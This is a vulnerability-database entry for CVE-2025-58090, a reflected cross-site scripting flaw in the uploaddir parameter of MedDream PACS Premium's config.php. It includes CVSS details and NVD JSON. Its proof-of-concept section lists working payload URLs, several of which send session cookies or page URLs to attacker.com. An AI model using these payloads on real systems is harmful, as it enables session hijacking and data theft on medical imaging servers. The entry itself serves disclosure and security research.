Security Vulnerability Report
中文
CVE-2025-58090 CVSS 6.1 MEDIUM

CVE-2025-58090

Published: 2026-01-20 15:17:05
Last Modified: 2026-01-29 15:18:23

Description

Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities.This vulnerability affects the uploaddir parameter.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:* - VULNERABLE
MedDream PACS Premium 7.3.6.870

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-58090 PoC - Reflected XSS in MedDream PACS Premium config.php --> <!-- Target: MedDream PACS Premium 7.3.6.870 --> <!-- Attack Vector: uploaddir parameter in config.php --> <!-- Basic XSS PoC --> https://[TARGET]/config.php?uploaddir=<script>alert(document.domain)</script> <!-- Cookie Theft PoC --> https://[TARGET]/config.php?uploaddir=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> <!-- Session Hijacking PoC --> https://[TARGET]/config.php?uploaddir=<img src=x onerror="this.src='https://attacker.com/log?data='+document.cookie"></script> <!-- DOM-based XSS variant --> https://[TARGET]/config.php?uploaddir=</script><script>document.location='https://attacker.com/redirect?url='+document.URL</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58090", "sourceIdentifier": "[email protected]", "published": "2026-01-20T15:17:04.587", "lastModified": "2026-01-29T15:18:22.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities.This vulnerability affects the uploaddir parameter."}, {"lang": "es", "value": "Múltiples vulnerabilidades de cross-site scripting (XSS) reflejado existen en la funcionalidad config.php de MedDream PACS Premium 7.3.6.870. URLs maliciosas especialmente diseñadas pueden llevar a la ejecución de código JavaScript arbitrario. Un atacante puede proporcionar una URL diseñada para activar estas vulnerabilidades. Esta vulnerabilidad afecta al parámetro uploaddir."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:*", "matchCriteriaId": "0F239E49-18E8-4DE0-B9B8-C220C3BC0C62"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}